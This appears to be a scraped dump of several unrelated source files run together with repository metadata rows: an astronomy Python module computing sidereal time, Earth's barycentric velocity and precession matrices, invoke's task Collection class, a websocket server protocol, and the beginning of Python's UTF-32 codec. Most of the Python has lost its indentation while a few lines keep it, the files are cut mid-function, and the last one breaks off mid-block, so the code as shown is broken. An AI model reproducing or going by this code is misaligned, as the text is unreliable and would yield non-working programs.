# info on sidereal time, as well as an interactive calculator.
# PROCEDURES USED:
# jdcnv - Convert from year, month, day, hour to julian date
#
# MODIFICATION HISTORY:
# Adapted from the FORTRAN program GETSD by Michael R. Greason, STX,
# 27 October 1988.
# Use IAU 1984 constants Wayne Landsman, HSTX, April 1995, results
# differ by about 0.1 seconds
# Longitudes measured *east* of Greenwich W. Landsman December 1998
# Time zone now measure positive East of Greenwich W. Landsman July 2008
# Remove debugging print statement W. Landsman April 2009
"""
# IF N_params() gt 4 THEN BEGIN
# time = tme - tz
# jdcnv, year, mon, day, time, jd
# ENDIF ELSE jd = double(tme)
#
# Useful constants, see Meeus, p.84
#
c = [280.46061837, 360.98564736629, 0.000387933, 38710000.0]
jd2000 = 2451545.0
t0 = jd - jd2000
t = t0 / 36525
#
# Compute GST in seconds.
#
theta = c[0] + (c[1] * t0) + t ** 2 * (c[2] - t / c[3])
#
# Compute LST in hours.
#
lst = np.array((theta + lng) / 15.0)
neg = lst < 0
if np.sum(neg) > 0:
if neg.shape == tuple():
lst = 24. + idl_like_mod(lst, 24.)
else:
lst[neg] = 24. + idl_like_mod(lst[neg], 24.)
return idl_like_mod(lst, 24.)
def baryvel(dje, deq):
#+
# NAME:
# BARYVEL
# PURPOSE:
# Calculates heliocentric and barycentric velocity components of Earth.
#
# EXPLANATION:
# BARYVEL takes into account the Earth-Moon motion, and is useful for
# radial velocity work to an accuracy of ~1 m/s.
#
# CALLING SEQUENCE:
# BARYVEL, dje, deq, dvelh, dvelb, [ JPL = ]
#
# INPUTS:
# DJE - (scalar) Julian ephemeris date.
# DEQ - (scalar) epoch of mean equinox of dvelh and dvelb. If deq=0
# then deq is assumed to be equal to dje.
# OUTPUTS:
# DVELH: (vector(3)) heliocentric velocity component. in km/s
# DVELB: (vector(3)) barycentric velocity component. in km/s
#
# The 3-vectors DVELH and DVELB are given in a right-handed coordinate
# system with the +X axis toward the Vernal Equinox, and +Z axis
# toward the celestial pole.
#
# OPTIONAL KEYWORD SET:
# JPL - if /JPL set, then BARYVEL will call the procedure JPLEPHINTERP
# to compute the Earth velocity using the full JPL ephemeris.
# The JPL ephemeris FITS file JPLEPH.405 must exist in either the
# current directory, or in the directory specified by the
# environment variable ASTRO_DATA. Alternatively, the JPL keyword
# can be set to the full path and name of the ephemeris file.
# A copy of the JPL ephemeris FITS file is available in
# http://idlastro.gsfc.nasa.gov/ftp/data/
# PROCEDURES CALLED:
# Function PREMAT() -- computes precession matrix
# JPLEPHREAD, JPLEPHINTERP, TDB2TDT - if /JPL keyword is set
# NOTES:
# Algorithm taken from FORTRAN program of Stumpff (1980, A&A Suppl, 41,1)
# Stumpf claimed an accuracy of 42 cm/s for the velocity. A
# comparison with the JPL FORTRAN planetary ephemeris program PLEPH
# found agreement to within about 65 cm/s between 1986 and 1994
#
# If /JPL is set (using JPLEPH.405 ephemeris file) then velocities are
# given in the ICRS system# otherwise in the FK4 system.
# EXAMPLE:
# Compute the radial velocity of the Earth toward Altair on 15-Feb-1994
# using both the original Stumpf algorithm and the JPL ephemeris
#
# IDL> jdcnv, 1994, 2, 15, 0, jd #==> JD = 2449398.5
# IDL> baryvel, jd, 2000, vh, vb #Original algorithm
# ==> vh = [-17.07243, -22.81121, -9.889315] #Heliocentric km/s
# ==> vb = [-17.08083, -22.80471, -9.886582] #Barycentric km/s
# IDL> baryvel, jd, 2000, vh, vb, /jpl #JPL ephemeris
# ==> vh = [-17.07236, -22.81126, -9.889419] #Heliocentric km/s
# ==> vb = [-17.08083, -22.80484, -9.886409] #Barycentric km/s
#
# IDL> ra = ten(19,50,46.77)*15/!RADEG #RA in radians
# IDL> dec = ten(08,52,3.5)/!RADEG #Dec in radians
# IDL> v = vb[0]*cos(dec)*cos(ra) + $ #Project velocity toward star
# vb[1]*cos(dec)*sin(ra) + vb[2]*sin(dec)
#
# REVISION HISTORY:
# Jeff Valenti, U.C. Berkeley Translated BARVEL.FOR to IDL.
# W. Landsman, Cleaned up program sent by Chris McCarthy (SfSU) June 1994
# Converted to IDL V5.0 W. Landsman September 1997
# Added /JPL keyword W. Landsman July 2001
# Documentation update W. Landsman Dec 2005
#-
#Define constants
dc2pi = 2* pi
cc2pi = dc2pi
dc1 = 1.0
dcto = 2415020.0
dcjul = 36525.0 #days in Julian year
dcbes = 0.313
dctrop = 365.24219572 #days in tropical year (...572 insig)
dc1900 = 1900.0
AU = 1.4959787e8
#Constants dcfel(i,k) of fast changing elements.
dcfel = [1.7400353e00, 6.2833195099091e02, 5.2796e-6 \
,6.2565836e00, 6.2830194572674e02, -2.6180e-6 \
,4.7199666e00, 8.3997091449254e03, -1.9780e-5 \
,1.9636505e-1, 8.4334662911720e03, -5.6044e-5 \
,4.1547339e00, 5.2993466764997e01, 5.8845e-6 \
,4.6524223e00, 2.1354275911213e01, 5.6797e-6 \
,4.2620486e00, 7.5025342197656e00, 5.5317e-6 \
,1.4740694e00, 3.8377331909193e00, 5.6093e-6 ]
dcfel = np.array(dcfel).reshape(8,3)
#constants dceps and ccsel(i,k) of slowly changing elements.
dceps = [4.093198e-1, -2.271110e-4, -2.860401e-8 ]
ccsel = [1.675104E-2, -4.179579E-5, -1.260516E-7 \
,2.220221E-1, 2.809917E-2, 1.852532E-5 \
,1.589963E00, 3.418075E-2, 1.430200E-5 \
,2.994089E00, 2.590824E-2, 4.155840E-6 \
,8.155457E-1, 2.486352E-2, 6.836840E-6 \
,1.735614E00, 1.763719E-2, 6.370440E-6 \
,1.968564E00, 1.524020E-2, -2.517152E-6 \
,1.282417E00, 8.703393E-3, 2.289292E-5 \
,2.280820E00, 1.918010E-2, 4.484520E-6 \
,4.833473E-2, 1.641773E-4, -4.654200E-7 \
,5.589232E-2, -3.455092E-4, -7.388560E-7 \
,4.634443E-2, -2.658234E-5, 7.757000E-8 \
,8.997041E-3, 6.329728E-6, -1.939256E-9 \
,2.284178E-2, -9.941590E-5, 6.787400E-8 \
,4.350267E-2, -6.839749E-5, -2.714956E-7 \
,1.348204E-2, 1.091504E-5, 6.903760E-7 \
,3.106570E-2, -1.665665E-4, -1.590188E-7 ]
ccsel = np.array(ccsel).reshape(17,3)
#Constants of the arguments of the short-period perturbations.
dcargs = [5.0974222, -7.8604195454652e2 \
,3.9584962, -5.7533848094674e2 \
,1.6338070, -1.1506769618935e3 \
,2.5487111, -3.9302097727326e2 \
,4.9255514, -5.8849265665348e2 \
,1.3363463, -5.5076098609303e2 \
,1.6072053, -5.2237501616674e2 \
,1.3629480, -1.1790629318198e3 \
,5.5657014, -1.0977134971135e3 \
,5.0708205, -1.5774000881978e2 \
,3.9318944, 5.2963464780000e1 \
,4.8989497, 3.9809289073258e1 \
,1.3097446, 7.7540959633708e1 \
,3.5147141, 7.9618578146517e1 \
,3.5413158, -5.4868336758022e2 ]
dcargs = np.array(dcargs).reshape(15,2)
#Amplitudes ccamps(n,k) of the short-period perturbations.
ccamps = \
[-2.279594E-5, 1.407414E-5, 8.273188E-6, 1.340565E-5, -2.490817E-7 \
,-3.494537E-5, 2.860401E-7, 1.289448E-7, 1.627237E-5, -1.823138E-7 \
, 6.593466E-7, 1.322572E-5, 9.258695E-6, -4.674248E-7, -3.646275E-7 \
, 1.140767E-5, -2.049792E-5, -4.747930E-6, -2.638763E-6, -1.245408E-7 \
, 9.516893E-6, -2.748894E-6, -1.319381E-6, -4.549908E-6, -1.864821E-7 \
, 7.310990E-6, -1.924710E-6, -8.772849E-7, -3.334143E-6, -1.745256E-7 \
,-2.603449E-6, 7.359472E-6, 3.168357E-6, 1.119056E-6, -1.655307E-7 \
,-3.228859E-6, 1.308997E-7, 1.013137E-7, 2.403899E-6, -3.736225E-7 \
, 3.442177E-7, 2.671323E-6, 1.832858E-6, -2.394688E-7, -3.478444E-7 \
, 8.702406E-6, -8.421214E-6, -1.372341E-6, -1.455234E-6, -4.998479E-8 \
,-1.488378E-6, -1.251789E-5, 5.226868E-7, -2.049301E-7, 0.E0 \
,-8.043059E-6, -2.991300E-6, 1.473654E-7, -3.154542E-7, 0.E0 \
, 3.699128E-6, -3.316126E-6, 2.901257E-7, 3.407826E-7, 0.E0 \
, 2.550120E-6, -1.241123E-6, 9.901116E-8, 2.210482E-7, 0.E0 \
,-6.351059E-7, 2.341650E-6, 1.061492E-6, 2.878231E-7, 0.E0 ]
ccamps = np.array(ccamps).reshape(15,5)
#Constants csec3 and ccsec(n,k) of the secular perturbations in longitude.
ccsec3 = -7.757020E-8
ccsec = [1.289600E-6, 5.550147E-1, 2.076942E00 \
,3.102810E-5, 4.035027E00, 3.525565E-1 \
,9.124190E-6, 9.990265E-1, 2.622706E00 \
,9.793240E-7, 5.508259E00, 1.559103E01 ]
ccsec = np.array(ccsec).reshape(4,3)
#Sidereal rates.
dcsld = 1.990987e-7 #sidereal rate in longitude
ccsgd = 1.990969E-7 #sidereal rate in mean anomaly
#Constants used in the calculation of the lunar contribution.
cckm = 3.122140E-5
ccmld = 2.661699E-6
ccfdi = 2.399485E-7
#Constants dcargm(i,k) of the arguments of the perturbations of the motion
# of the moon.
dcargm = [5.1679830, 8.3286911095275e3 \
,5.4913150, -7.2140632838100e3 \
,5.9598530, 1.5542754389685e4 ]
dcargm = np.array(dcargm).reshape(3,2)
#Amplitudes ccampm(n,k) of the perturbations of the moon.
ccampm = [ 1.097594E-1, 2.896773E-7, 5.450474E-2, 1.438491E-7 \
,-2.223581E-2, 5.083103E-8, 1.002548E-2, -2.291823E-8 \
, 1.148966E-2, 5.658888E-8, 8.249439E-3, 4.063015E-8 ]
ccampm = np.array(ccampm).reshape(3,4)
#ccpamv(k)=a*m*dl,dt (planets), dc1mme=1-mass(earth+moon)
ccpamv = [8.326827E-11, 1.843484E-11, 1.988712E-12, 1.881276E-12]
dc1mme = 0.99999696
#Time arguments.
dt = (dje - dcto) / dcjul
tvec = np.array([1., dt, dt*dt])
#Values of all elements for the instant(aneous?) dje.
temp = idl_like_mod(idl_like_pound(tvec,dcfel), dc2pi)
#PROBLEM: the mod here is where the 100 m/s error slips in
dml = temp[:,0]
forbel = temp[:,1:8]
g = forbel[:,0] #old fortran equivalence
deps = idl_like_mod(np.sum(tvec*dceps), dc2pi)
sorbel = idl_like_mod(idl_like_pound(tvec, ccsel), dc2pi)
e = sorbel[:, 0] #old fortran equivalence
#Secular perturbations in longitude.
dummy=cos(2.0)
sn = sin(idl_like_mod(idl_like_pound(tvec.ravel()[0:2] , ccsec[:, 1:3]),cc2pi))
#Periodic perturbations of the emb (earth-moon barycenter).
pertl = np.sum(ccsec[:,0] * sn) + dt*ccsec3*sn.ravel()[2]
pertld = 0.0
pertr = 0.0
pertrd = 0.0
    for k in range(15):  # all 15 short-period perturbation terms (IDL: FOR K=0,14)
a = idl_like_mod((dcargs[k,0]+dt*dcargs[k,1]), dc2pi)
cosa = cos(a)
sina = sin(a)
pertl = pertl + ccamps[k,0]*cosa + ccamps[k,1]*sina
pertr = pertr + ccamps[k,2]*cosa + ccamps[k,3]*sina
if k < 11:
pertld = pertld + (ccamps[k,1]*cosa-ccamps[k,0]*sina)*ccamps[k,4]
pertrd = pertrd + (ccamps[k,3]*cosa-ccamps[k,2]*sina)*ccamps[k,4]
#Elliptic part of the motion of the emb.
phi = (e*e/4)*(((8/e)-e)*sin(g) +5*sin(2*g) +(13/3)*e*sin(3*g))
f = g + phi
sinf = sin(f)
cosf = cos(f)
dpsi = (dc1 - e*e) / (dc1 + e*cosf)
phid = 2*e*ccsgd*((1 + 1.5*e*e)*cosf + e*(1.25 - 0.5*sinf*sinf))
psid = ccsgd*e*sinf * (dc1 - e*e)**-0.5
#Perturbed heliocentric motion of the emb.
d1pdro = dc1+pertr
drd = d1pdro * (psid + dpsi*pertrd)
drld = d1pdro*dpsi * (dcsld+phid+pertld)
dtl = idl_like_mod((dml + phi + pertl), dc2pi)
dsinls = sin(dtl)
dcosls = cos(dtl)
dxhd = drd*dcosls - drld*dsinls
dyhd = drd*dsinls + drld*dcosls
#Influence of eccentricity, evection and variation on the geocentric
# motion of the moon.
pertl = 0.0
pertld = 0.0
pertp = 0.0
pertpd = 0.0
    for k in range(3):  # all 3 lunar perturbation terms (IDL: FOR K=0,2)
a = idl_like_mod((dcargm[k,0] + dt*dcargm[k,1]), dc2pi)
sina = sin(a)
cosa = cos(a)
pertl = pertl + ccampm[k,0]*sina
pertld = pertld + ccampm[k,1]*cosa
pertp = pertp + ccampm[k,2]*cosa
pertpd = pertpd - ccampm[k,3]*sina
#Heliocentric motion of the earth.
tl = forbel.ravel()[1] + pertl
sinlm = sin(tl)
coslm = cos(tl)
sigma = cckm / (1.0 + pertp)
a = sigma*(ccmld + pertld)
b = sigma*pertpd
dxhd = dxhd + a*sinlm + b*coslm
dyhd = dyhd - a*coslm + b*sinlm
dzhd= -sigma*ccfdi*cos(forbel.ravel()[2])
#Barycentric motion of the earth.
dxbd = dxhd*dc1mme
dybd = dyhd*dc1mme
dzbd = dzhd*dc1mme
for k in range(3):
plon = forbel.ravel()[k+3]
pomg = sorbel.ravel()[k+1]
pecc = sorbel.ravel()[k+9]
tl = idl_like_mod((plon + 2.0*pecc*sin(plon-pomg)), cc2pi)
dxbd = dxbd + ccpamv[k]*(sin(tl) + pecc*sin(pomg))
dybd = dybd - ccpamv[k]*(cos(tl) + pecc*cos(pomg))
dzbd = dzbd - ccpamv[k]*sorbel.ravel()[k+13]*cos(plon - sorbel.ravel()[k+5])
#Transition to mean equator of date.
dcosep = cos(deps)
dsinep = sin(deps)
dyahd = dcosep*dyhd - dsinep*dzhd
dzahd = dsinep*dyhd + dcosep*dzhd
dyabd = dcosep*dybd - dsinep*dzbd
dzabd = dsinep*dybd + dcosep*dzbd
#Epoch of mean equinox (deq) of zero implies that we should use
# Julian ephemeris date (dje) as epoch of mean equinox.
if deq == 0:
dvelh = AU * ([dxhd, dyahd, dzahd])
dvelb = AU * ([dxbd, dyabd, dzabd])
return dvelh, dvelb
#General precession from epoch dje to deq.
deqdat = (dje-dcto-dcbes) / dctrop + dc1900
prema = premat(deqdat,deq,FK4=True)
dvelh = AU * idl_like_pound( prema, [dxhd, dyahd, dzahd] )
dvelb = AU * idl_like_pound( prema, [dxbd, dyabd, dzabd] )
return dvelh, dvelb
def premat(equinox1, equinox2, FK4=False):
"""
#+
# NAME:
# PREMAT
# PURPOSE:
# Return the precession matrix needed to go from EQUINOX1 to EQUINOX2.
# EXPLANTION:
# This matrix is used by the procedures PRECESS and BARYVEL to precess
# astronomical coordinates
#
# CALLING SEQUENCE:
# matrix = PREMAT( equinox1, equinox2, [ /FK4 ] )
#
# INPUTS:
# EQUINOX1 - Original equinox of coordinates, numeric scalar.
# EQUINOX2 - Equinox of precessed coordinates.
#
# OUTPUT:
# matrix - double precision 3 x 3 precession matrix, used to precess
# equatorial rectangular coordinates
#
# OPTIONAL INPUT KEYWORDS:
# /FK4 - If this keyword is set, the FK4 (B1950.0) system precession
# angles are used to compute the precession matrix. The
# default is to use FK5 (J2000.0) precession angles
#
# EXAMPLES:
# Return the precession matrix from 1950.0 to 1975.0 in the FK4 system
#
# IDL> matrix = PREMAT( 1950.0, 1975.0, /FK4)
#
# PROCEDURE:
# FK4 constants from "Computational Spherical Astronomy" by Taff (1983),
# p. 24. (FK4). FK5 constants from "Astronomical Almanac Explanatory
# Supplement 1992, page 104 Table 3.211.1.
#
# REVISION HISTORY
# Written, Wayne Landsman, HSTX Corporation, June 1994
# Converted to IDL V5.0 W. Landsman September 1997
#-
"""
deg_to_rad = pi/180.0
sec_to_rad = deg_to_rad/3600.
T = 0.001 * ( equinox2 - equinox1)
if not FK4: # FK5
ST = 0.001*( equinox1 - 2000.)
# Compute 3 rotation angles
A = sec_to_rad * T * (23062.181 + ST*(139.656 +0.0139*ST) \
+ T*(30.188 - 0.344*ST+17.998*T))
B = sec_to_rad * T * T * (79.280 + 0.410*ST + 0.205*T) + A
C = sec_to_rad * T * (20043.109 - ST*(85.33 + 0.217*ST) \
+ T*(-42.665 - 0.217*ST -41.833*T))
else:
ST = 0.001*( equinox1 - 1900.)
# Compute 3 rotation angles
A = sec_to_rad * T * (23042.53 + ST*(139.75 +0.06*ST) \
+ T*(30.23 - 0.27*ST+18.0*T))
B = sec_to_rad * T * T * (79.27 + 0.66*ST + 0.32*T) + A
C = sec_to_rad * T * (20046.85 - ST*(85.33 + 0.37*ST) \
+ T*(-42.67 - 0.37*ST -41.8*T))
sina = sin(A)
sinb = sin(B)
sinc = sin(C)
cosa = cos(A)
cosb = cos(B)
cosc = cos(C)
r = np.empty([3, 3])
r[:,0] = [ cosa*cosb*cosc-sina*sinb, sina*cosb+cosa*sinb*cosc, cosa*sinc]
r[:,1] = [-cosa*sinb-sina*cosb*cosc, cosa*cosb-sina*sinb*cosc, -sina*sinc]
r[:,2] = [-cosb*sinc, -sinb*sinc, cosc]
return r
def idl_like_pound(a, b):
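    # Rough emulation of IDL's '#' matrix multiplication operator for the 1-D/2-D array shapes used in this module.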
a = np.array(a, copy=False)
b = np.array(b, copy=False)
if len(a.shape) == 2 and len(b.shape) == 1:
return np.dot(a.T, b)
if len(a.shape) == 1 and len(b.shape) == 2:
res = np.dot(a, b.T)
return res.reshape(1, res.size)
else:
return np.dot(a, b)
def idl_like_mod(a, b):
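    # Rough emulation of IDL's MOD operator, whose result keeps the sign of the dividend (unlike numpy's %).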
a = np.array(a, copy=False)
b = np.array(b, copy=False)
res = np.abs(a) % b
if a.shape == tuple():
if a<0:
return -res
else:
return res
else:
res[a<0] *= -1
return res
| mit | 7,700,543,838,721,033,000 | 37.855025 | 85 | 0.578418 | false |
mattrobenolt/invoke | invoke/collection.py | 5 | 15319 | import copy
import types
from .vendor import six
from .vendor.lexicon import Lexicon
from .config import merge_dicts
from .parser import Context as ParserContext
from .tasks import Task
class Collection(object):
"""
A collection of executable tasks.
"""
def __init__(self, *args, **kwargs):
"""
Create a new task collection/namespace.
`.Collection` offers a set of methods for building a collection of
tasks from scratch, plus a convenient constructor wrapping said API.
In either case:
* the first positional argument may be a string, which (if given) is
used as the collection's default name when performing namespace
lookups;
* a ``loaded_from`` keyword argument may be given, which sets metadata
indicating the filesystem path the collection was loaded from. This
is used as a guide when loading per-project :ref:`configuration files
<config-hierarchy>`.
**The method approach**
May initialize with no arguments and use methods (e.g.
`.add_task`/`.add_collection`) to insert objects::
c = Collection()
c.add_task(some_task)
If an initial string argument is given, it is used as the default name
for this collection, should it be inserted into another collection as a
sub-namespace::
docs = Collection('docs')
docs.add_task(doc_task)
ns = Collection()
ns.add_task(top_level_task)
ns.add_collection(docs)
# Valid identifiers are now 'top_level_task' and 'docs.doc_task'
# (assuming the task objects were actually named the same as the
# variables we're using :))
For details, see the API docs for the rest of the class.
**The constructor approach**
All ``*args`` given to `.Collection` (besides the abovementioned
optional positional 'name' argument and ``loaded_from`` kwarg) are
expected to be `.Task` or `.Collection` instances which will be passed
to `.add_task`/`.add_collection` as appropriate. Module objects are
also valid (as they are for `.add_collection`). For example, the below
snippet results in the same two task identifiers as the one above::
ns = Collection(top_level_task, Collection('docs', doc_task))
If any ``**kwargs`` are given, the keywords are used as the initial
name arguments for the respective values::
ns = Collection(
top_level_task=some_other_task,
docs=Collection(doc_task)
)
That's exactly equivalent to::
docs = Collection(doc_task)
ns = Collection()
ns.add_task(some_other_task, 'top_level_task')
ns.add_collection(docs, 'docs')
See individual methods' API docs for details.
"""
# Initialize
self.tasks = Lexicon()
self.collections = Lexicon()
self.default = None
self.name = None
self._configuration = {}
# Name if applicable
args = list(args)
if args and isinstance(args[0], six.string_types):
self.name = args.pop(0)
# Specific kwargs if applicable
self.loaded_from = kwargs.pop('loaded_from', None)
# Dispatch args/kwargs
for arg in args:
self._add_object(arg)
# Dispatch kwargs
for name, obj in six.iteritems(kwargs):
self._add_object(obj, name)
def _add_object(self, obj, name=None):
if isinstance(obj, Task):
method = self.add_task
elif isinstance(obj, (Collection, types.ModuleType)):
method = self.add_collection
else:
raise TypeError("No idea how to insert {0!r}!".format(type(obj)))
return method(obj, name=name)
def __str__(self):
return "<Collection {0!r}: {1}>".format(
self.name, ", ".join(sorted(self.tasks.keys())))
def __repr__(self):
return str(self)
def __eq__(self, other):
return self.name == other.name and self.tasks == other.tasks
@classmethod
def from_module(self, module, name=None, config=None, loaded_from=None):
"""
Return a new `.Collection` created from ``module``.
Inspects ``module`` for any `.Task` instances and adds them to a new
`.Collection`, returning it. If any explicit namespace collections
exist (named ``ns`` or ``namespace``) a copy of that collection object
is preferentially loaded instead.
When the implicit/default collection is generated, it will be named
after the module's ``__name__`` attribute, or its last dotted section
if it's a submodule. (I.e. it should usually map to the actual ``.py``
filename.)
Explicitly given collections will only be given that module-derived
name if they don't already have a valid ``.name`` attribute.
:param str name:
A string, which if given will override any automatically derived
collection name (or name set on the module's root namespace, if it
has one.)
:param dict config:
Used to set config options on the newly created `.Collection`
before returning it (saving you a call to `.configure`.)
If the imported module had a root namespace object, ``config`` is
merged on top of it (i.e. overriding any conflicts.)
:param str loaded_from:
Identical to the same-named kwarg from the regular class
constructor - should be the path where the module was
found.
"""
module_name = module.__name__.split('.')[-1]
# See if the module provides a default NS to use in lieu of creating
# our own collection.
for candidate in ('ns', 'namespace'):
obj = getattr(module, candidate, None)
if obj and isinstance(obj, Collection):
# TODO: make this into Collection.clone() or similar
# Explicitly given name wins over root ns name which wins over
# actual module name.
ret = Collection(name or obj.name or module_name,
loaded_from=loaded_from)
ret.tasks = copy.deepcopy(obj.tasks)
ret.collections = copy.deepcopy(obj.collections)
ret.default = copy.deepcopy(obj.default)
# Explicitly given config wins over root ns config
obj_config = copy.deepcopy(obj._configuration)
if config:
merge_dicts(obj_config, config)
ret._configuration = obj_config
return ret
# Failing that, make our own collection from the module's tasks.
tasks = filter(
lambda x: isinstance(x, Task),
vars(module).values()
)
# Again, explicit name wins over implicit one from module path
collection = Collection(name or module_name, loaded_from=loaded_from)
for task in tasks:
collection.add_task(task)
if config:
collection.configure(config)
return collection
def add_task(self, task, name=None, default=None):
"""
Add `.Task` ``task`` to this collection.
:param task: The `.Task` object to add to this collection.
:param name:
Optional string name to bind to (overrides the task's own
self-defined ``name`` attribute and/or any Python identifier (i.e.
``.func_name``.)
:param default: Whether this task should be the collection default.
"""
if name is None:
if task.name:
name = task.name
elif hasattr(task.body, 'func_name'):
name = task.body.func_name
elif hasattr(task.body, '__name__'):
name = task.__name__
else:
raise ValueError("Could not obtain a name for this task!")
if name in self.collections:
raise ValueError("Name conflict: this collection has a sub-collection named {0!r} already".format(name)) # noqa
self.tasks[name] = task
for alias in task.aliases:
self.tasks.alias(alias, to=name)
if default is True or (default is None and task.is_default):
if self.default:
msg = "'{0}' cannot be the default because '{1}' already is!"
raise ValueError(msg.format(name, self.default))
self.default = name
def add_collection(self, coll, name=None):
"""
Add `.Collection` ``coll`` as a sub-collection of this one.
:param coll: The `.Collection` to add.
:param str name:
The name to attach the collection as. Defaults to the collection's
own internal name.
"""
# Handle module-as-collection
if isinstance(coll, types.ModuleType):
coll = Collection.from_module(coll)
# Ensure we have a name, or die trying
name = name or coll.name
if not name:
raise ValueError("Non-root collections must have a name!")
# Test for conflict
if name in self.tasks:
raise ValueError("Name conflict: this collection has a task named {0!r} already".format(name)) # noqa
# Insert
self.collections[name] = coll
def split_path(self, path):
"""
Obtain first collection + remainder, of a task path.
E.g. for ``"subcollection.taskname"``, return ``("subcollection",
"taskname")``; for ``"subcollection.nested.taskname"`` return
``("subcollection", "nested.taskname")``, etc.
An empty path becomes simply ``('', '')``.
"""
parts = path.split('.')
coll = parts.pop(0)
rest = '.'.join(parts)
return coll, rest
def __getitem__(self, name=None):
"""
Returns task named ``name``. Honors aliases and subcollections.
If this collection has a default task, it is returned when ``name`` is
empty or ``None``. If empty input is given and no task has been
selected as the default, ValueError will be raised.
Tasks within subcollections should be given in dotted form, e.g.
'foo.bar'. Subcollection default tasks will be returned on the
subcollection's name.
"""
return self.task_with_config(name)[0]
def _task_with_merged_config(self, coll, rest, ours):
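        # Look up the task inside the named subcollection and merge that collection's configuration with this one's.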
task, config = self.collections[coll].task_with_config(rest)
return task, dict(config, **ours)
def task_with_config(self, name):
"""
Return task named ``name`` plus its configuration dict.
E.g. in a deeply nested tree, this method returns the `.Task`, and a
configuration dict created by merging that of this `.Collection` and
any nested `Collections <.Collection>`, up through the one actually
holding the `.Task`.
See `~.Collection.__getitem__` for semantics of the ``name`` argument.
:returns: Two-tuple of (`.Task`, `dict`).
"""
# Our top level configuration
ours = self.configuration()
# Default task for this collection itself
if not name:
if self.default:
return self[self.default], ours
else:
raise ValueError("This collection has no default task.")
# Non-default tasks within subcollections -> recurse (sorta)
if '.' in name:
coll, rest = self.split_path(name)
return self._task_with_merged_config(coll, rest, ours)
# Default task for subcollections (via empty-name lookup)
if name in self.collections:
return self._task_with_merged_config(name, '', ours)
# Regular task lookup
return self.tasks[name], ours
def __contains__(self, name):
try:
self[name]
return True
except KeyError:
return False
def to_contexts(self):
"""
Returns all contained tasks and subtasks as a list of parser contexts.
"""
result = []
for primary, aliases in six.iteritems(self.task_names):
task = self[primary]
result.append(ParserContext(
name=primary, aliases=aliases, args=task.get_arguments()
))
return result
def subtask_name(self, collection_name, task_name):
return '.'.join([collection_name, task_name])
@property
def task_names(self):
"""
Return all task identifiers for this collection as a dict.
Specifically, a dict with the primary/"real" task names as the key, and
any aliases as a list value.
"""
ret = {}
# Our own tasks get no prefix, just go in as-is: {name: [aliases]}
for name, task in six.iteritems(self.tasks):
ret[name] = task.aliases
# Subcollection tasks get both name + aliases prefixed
for coll_name, coll in six.iteritems(self.collections):
for task_name, aliases in six.iteritems(coll.task_names):
# Cast to list to handle Py3 map() 'map' return value,
# so we can add to it down below if necessary.
aliases = list(map(
lambda x: self.subtask_name(coll_name, x),
aliases
))
# Tack on collection name to alias list if this task is the
# collection's default.
if coll.default and coll.default == task_name:
aliases += (coll_name,)
ret[self.subtask_name(coll_name, task_name)] = aliases
return ret
def configuration(self, taskpath=None):
"""
Obtain merged configuration values from collection & children.
.. note::
Merging uses ``copy.deepcopy`` to prevent state bleed.
:param taskpath:
(Optional) Task name/path, identical to that used for
`~.Collection.__getitem__` (e.g. may be dotted for nested tasks,
etc.) Used to decide which path to follow in the collection tree
when merging config values.
:returns: A `dict` containing configuration values.
"""
if taskpath is None:
return copy.deepcopy(self._configuration)
return self.task_with_config(taskpath)[1]
def configure(self, options):
"""
(Recursively) merge ``options`` into the current `.configuration`.
Options configured this way will be available to all
:doc:`contextualized tasks </concepts/context>`. It is recommended to
        use unique keys to avoid potential clashes with other config options.
For example, if you were configuring a Sphinx docs build target
directory, it's better to use a key like ``'sphinx.target'`` than
simply ``'target'``.
:param options: An object implementing the dictionary protocol.
:returns: ``None``.
"""
merge_dicts(self._configuration, options)
| bsd-2-clause | -8,001,643,771,406,033,000 | 37.880711 | 123 | 0.590639 | false |
Evgenus/revigred-server | revigred/protocol.py | 1 | 1500 | import asyncio
import json
from autobahn.asyncio.websocket import (
WebSocketServerProtocol,
WebSocketServerFactory,
)
class ServerProtocol(WebSocketServerProtocol):
def onConnect(self, request):
self.client = self.model.create_new_user()
self.client.connect(self)
self.logger.debug("Client connecting: {0}", request.peer)
@asyncio.coroutine
def onOpen(self):
self.client.channel_opened()
@asyncio.coroutine
def onMessage(self, payload, isBinary):
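        # Binary frames are ignored; text frames carry a JSON-encoded [name, args, kwargs] triple that is dispatched to the client.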
if isBinary:
pass
else:
message = json.loads(payload.decode('utf8'))
self.logger.debug("Text message received from {0}: {1}", self.client, payload.decode('utf8'))
name, args, kwargs = message
self.client.dispatch(name, *args, **kwargs)
def onClose(self, wasClean, code, reason):
self.client.disconnect()
self.logger.debug("WebSocket connection closed: {0}", reason)
def sendMessage(self, message):
data = json.dumps(message).encode("utf-8")
super().sendMessage(data, False)
class ServerFactory(WebSocketServerFactory):
protocol = ServerProtocol
def __init__(self, *args, **kwargs):
self.model = kwargs.pop("model")
self.logger = kwargs.pop("logger")
super().__init__(*args, **kwargs)
def __call__(self):
proto = super().__call__()
proto.model = self.model
proto.logger = self.logger
return proto | bsd-3-clause | -5,139,739,119,801,721,000 | 29.632653 | 105 | 0.625333 | false |
deanhiller/databus | webapp/play1.3.x/python/Lib/encodings/utf_32.py | 3 | 5098 | """
Python 'utf-32' Codec
"""
import codecs, sys
### Codec APIs
encode = codecs.utf_32_encode
def decode(input, errors='strict'):
return codecs.utf_32_decode(input, errors, True)
class IncrementalEncoder(codecs.IncrementalEncoder):
def __init__(self, errors='strict'):
codecs.IncrementalEncoder.__init__(self, errors)
self.encoder = None
def encode(self, input, final=False):
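        # First chunk: use the generic codec so a BOM is emitted, then remember the endian-specific encoder for later chunks.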
if self.encoder is None:
result = codecs.utf_32_encode(input, self.errors)[0]
if sys.byteorder == 'little':
self.encoder = codecs.utf_32_le_encode
else:
self.encoder = codecs.utf_32_be_encode
return result
return self.encoder(input, self.errors)[0]
def reset(self):
codecs.IncrementalEncoder.reset(self)
self.encoder = None
def getstate(self):
# state info we return to the caller:
# 0: stream is in natural order for this platform
# 2: endianness hasn't been determined yet
# (we're never writing in unnatural order)
return (2 if self.encoder is None else 0)
def setstate(self, state):
if state:
self.encoder = None
else:
if sys.byteorder == 'little':
self.encoder = codecs.utf_32_le_encode
else:
self.encoder = codecs.utf_32_be_encode
class IncrementalDecoder(codecs.BufferedIncrementalDecoder):
def __init__(self, errors='strict'):
codecs.BufferedIncrementalDecoder.__init__(self, errors)
self.decoder = None
def _buffer_decode(self, input, errors, final):
if self.decoder is None:
(output, consumed, byteorder) = \
codecs.utf_32_ex_decode(input, errors, 0, final)
if byteorder == -1:
self.decoder = codecs.utf_32_le_decode
elif byteorder == 1:
self.decoder = codecs.utf_32_be_decode
elif consumed >= 4:
